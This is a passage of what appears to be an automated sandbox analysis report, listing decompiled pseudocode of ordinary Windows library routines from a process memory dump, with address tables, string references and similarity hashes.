						if(E03709730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0378A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0378A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03709730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0378A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0378A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E036E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E036DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E036DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E036E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0377FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0378e547
0x0378e549
0x0378e54f
0x0378e553
0x0378e557
0x0378e55a
0x0378e55c
0x0378e55f
0x0378e561
0x0378e567
0x0378e56b
0x0378e7e2
0x00000000
0x0378e571
0x0378e575
0x0378e577
0x0378e57b
0x0378e57c
0x0378e57d
0x0378e57e
0x0378e57f
0x0378e588
0x0378e58f
0x0378e591
0x0378e592
0x0378e592
0x0378e596
0x0378e59e
0x0378e5a0
0x0378e5a6
0x0378e61d
0x0378e61d
0x0378e621
0x0378e623
0x0378e630
0x0378e630
0x0378e7e6
0x0378e7eb
0x0378e7ed
0x0378e7f4
0x0378e7fa
0x0378e7ff
0x0378e7ff
0x0378e80a
0x0378e812
0x0378e812
0x0378e5ab
0x0378e5b4
0x0378e5b9
0x0378e5be
0x0378e5c0
0x0378e5c2
0x0378e5c8
0x0378e5c9
0x0378e5cb
0x0378e5cc
0x0378e5d5
0x0378e5e4
0x0378e5f1
0x0378e5f8
0x0378e5f8
0x0378e5d5
0x0378e602
0x0378e616
0x0378e63d
0x0378e644
0x0378e64d
0x0378e652
0x0378e657
0x0378e659
0x0378e65b
0x0378e661
0x0378e662
0x0378e664
0x0378e665
0x0378e66e
0x0378e67d
0x0378e68a
0x0378e691
0x0378e691
0x0378e66e
0x0378e6b0
0x00000000
0x0378e6b6
0x0378e6bd
0x0378e6c7
0x0378e6d7
0x0378e6d9
0x0378e6db
0x0378e6de
0x0378e6e3
0x0378e6f3
0x0378e6fc
0x0378e700
0x0378e700
0x0378e704
0x0378e70a
0x0378e70a
0x0378e713
0x0378e716
0x0378e719
0x0378e720
0x0378e761
0x0378e76b
0x0378e774
0x0378e77a
0x0378e77a
0x0378e78a
0x0378e791
0x0378e799
0x0378e79b
0x0378e79f
0x0378e7aa
0x0378e7c0
0x0378e7ac
0x0378e7b2
0x0378e7b9
0x0378e7b9
0x0378e7c7
0x0378e806
0x00000000
0x0378e7c9
0x0378e7d1
0x0378e7d8
0x00000000
0x0378e7d8
0x00000000
0x00000000
0x0378e722
0x0378e72e
0x0378e748
0x0378e74c
0x0378e754
0x0378e756
0x0378e75c
0x0378e75c
0x00000000
0x0378e75c
0x0378e758
0x0378e758
0x00000000
0x0378e758
0x0378e750
0x00000000
0x00000000
0x0378e752
0x00000000
0x0378e752
0x0378e730
0x0378e735
0x0378e73d
0x0378e73f
0x00000000
0x00000000
0x0378e741
0x0378e741
0x00000000
0x0378e741
0x0378e739
0x00000000
0x00000000
0x0378e73b
0x00000000
0x0378e73b
0x0378e722
0x0378e720
0x0378e6b0
0x0378e618
0x00000000
0x0378e618

Strings

`, xrefs: 0378E670
`, xrefs: 0378E5D7

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 83ae16d54b01ff650e366acb3ae3b6e6672a8471ac63141aac363710c5aeffd9
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 3791AD356443429FE724EF25C844B1BB7E6BF84714F18892DF9A9CB680E774E804CB52

Uniqueness

Uniqueness Score: -1.00%

Function 037451BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E037451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x37a05f0);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E037453CA(0);
						return E0371D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0370F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E036E3690(1, _t117, 0x36a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0370AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L036E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0370AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0374500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03709860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x037451be
0x037451c3
0x037451c8
0x037451cd
0x037451d0
0x037451d3
0x037451d8
0x037451db
0x037451de
0x037451e0
0x037451e3
0x037451e6
0x037451e8
0x03745342
0x03745351
0x03745356
0x0374535a
0x03745360
0x03745363
0x03745366
0x03745369
0x03745369
0x0374536b
0x0374536b
0x03745370
0x037453a3
0x037453a4
0x037453a6
0x037453ab
0x037453ab
0x037453ae
0x037453ae
0x037453b5
0x037453bf
0x037453bf
0x03745375
0x03745396
0x037453a0
0x037453a0
0x00000000
0x03745396
0x03745377
0x03745379
0x0374537f
0x0374538c
0x03745390
0x00000000
0x03745390
0x037451ee
0x037451f1
0x03745301
0x03745310
0x03745315
0x03745318
0x0374531b
0x03745320
0x0374532e
0x03745331
0x00000000
0x03745331
0x03745328
0x03745329
0x00000000
0x03745329
0x037451fa
0x03745235
0x03745236
0x03745239
0x0374523f
0x03745240
0x03745241
0x03745242
0x03745246
0x03745247
0x0374524e
0x03745251
0x03745267
0x03745269
0x0374526e
0x0374527d
0x0374527e
0x03745281
0x03745282
0x03745287
0x03745288
0x0374528a
0x0374528f
0x03745294
0x00000000
0x00000000
0x0374529a
0x0374529c
0x0374529e
0x0374529e
0x037452a4
0x037452b0
0x00000000
0x00000000
0x037452ba
0x037452bc
0x037452bc
0x037452d4
0x037452d9
0x037452dc
0x037452e1
0x00000000
0x00000000
0x037452e7
0x037452f4
0x00000000
0x037452f4
0x03745270
0x00000000
0x03745270
0x037451fc
0x037451fd
0x03745202
0x03745203
0x03745205
0x0374520a
0x0374520f
0x00000000
0x00000000
0x0374521b
0x03745226
0x0374522b
0x0374521d
0x0374521d
0x03745222
0x03745222
0x0374522d
0x00000000

Strings

Legacy, xrefs: 03745226
UEFI, xrefs: 0374521D

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 276f7d470fced4c9a686cf5ccbe932033e56983d6e70ffe5de263488b9970651
Instruction ID: d46000a96cf08b109f482e2c3d725eb4e230a58e3c361661bb8ed2d85c04453c
Opcode Fuzzy Hash: 276f7d470fced4c9a686cf5ccbe932033e56983d6e70ffe5de263488b9970651
Instruction Fuzzy Hash: E2514CB5E007089FDB24DFA8C880AAEBBF8BF49714F14406DE559EB291E771AD00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 036CB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E036CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x379f7a8);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0371D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0370D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0370F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0371DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0370B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0370B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0370E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0370A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x036cb171
0x036cb171
0x036cb171
0x036cb171
0x036cb171
0x036cb176
0x036cb17b
0x036cb180
0x036cb186
0x036cb18f
0x036cb198
0x036cb1a4
0x036cb1aa
0x03724802
0x03724802
0x03724805
0x0372480c
0x0372480e
0x036cb1d1
0x036cb1d3
0x036cb1de
0x036cb1de
0x03724817
0x0372481e
0x03724820
0x03724822
0x03724822
0x03724824
0x03724824
0x0372482a
0x00000000
0x00000000
0x03724835
0x0372483a
0x0372483d
0x0372483f
0x03724842
0x03724842
0x03724842
0x03724846
0x0372484c
0x0372484e
0x03724851
0x03724851
0x03724853
0x03724854
0x03724854
0x03724858
0x0372485a
0x0372485a
0x0372485d
0x0372485f
0x03724861
0x03724861
0x03724866
0x0372486b
0x0372486e
0x03724871
0x03724876
0x03724876
0x03724878
0x0372487b
0x03724884
0x03724884
0x00000000
0x0372487d
0x0372487d
0x03724882
0x03724889
0x03724889
0x0372488f
0x03724891
0x037248e0
0x037248e2
0x037248e4
0x037248e4
0x037248e7
0x037248e7
0x037248ed
0x037248f4
0x037248f6
0x03724951
0x03724951
0x03724953
0x03724953
0x03724956
0x03724956
0x03724958
0x03724959
0x03724959
0x0372495d
0x0372495d
0x0372495f
0x0372495f
0x03724965
0x03724969
0x037249ba
0x037249ba
0x037249c1
0x037249c5
0x037249cc
0x037249d4
0x037249d7
0x037249da
0x037249e4
0x037249e5
0x037249f3
0x03724a02
0x00000000
0x03724a02
0x03724972
0x03724974
0x00000000
0x00000000
0x03724976
0x03724979
0x03724982
0x03724983
0x03724984
0x0372498b
0x0372498d
0x03724991
0x03724993
0x03724999
0x0372499d
0x037249a2
0x037249a2
0x037249a2
0x03724999
0x037249ac
0x00000000
0x037249b3
0x037248f8
0x037248fe
0x00000000
0x00000000
0x00000000
0x037248fe
0x03724895
0x0372489c
0x037248ad
0x037248b2
0x037248b5
0x037248b7
0x037248ba
0x037248bc
0x037248c6
0x037248c6
0x037248cb
0x037248d1
0x037248d4
0x037248d8
0x037248d8
0x00000000
0x037248d8
0x037248be
0x037248c0
0x00000000
0x00000000
0x037248c2
0x00000000
0x00000000
0x00000000
0x037248c4
0x00000000
0x03724882
0x0372487b
0x03724904
0x03724906
0x00000000
0x00000000
0x03724908
0x0372490e
0x00000000
0x00000000
0x03724910
0x03724917
0x03724917
0x00000000
0x03724917
0x036cb1ba
0x037247f9
0x037247fc
0x00000000
0x00000000
0x00000000
0x037247fc
0x036cb1c0
0x036cb1c0
0x036cb1c3
0x036cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 037248AD

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 1d46bacf3d1f640df4e4a9436c3fa0f2eabf5230ac4e5a7250abffefcec0010a
Instruction ID: fef743e2063add6368fbf6da6760927754c7e5b543c7bb3c6df08161b034087e
Opcode Fuzzy Hash: 1d46bacf3d1f640df4e4a9436c3fa0f2eabf5230ac4e5a7250abffefcec0010a
Instruction Fuzzy Hash: E351ED75D142A98ADB31CF6AC845BBEBFB0AF04710F1841ADE899AB281D7744941AF90

Uniqueness

Uniqueness Score: -1.00%

Function 036EB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E036EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x37bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E036E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03798CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03709E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0370B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0370CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E036E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03798F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0370AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x37b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x37b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x37b8628; // 0x0
							_t116 =  *0x37b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x036eb94c
0x036eb956
0x036eb95c
0x036eb95e
0x036eb964
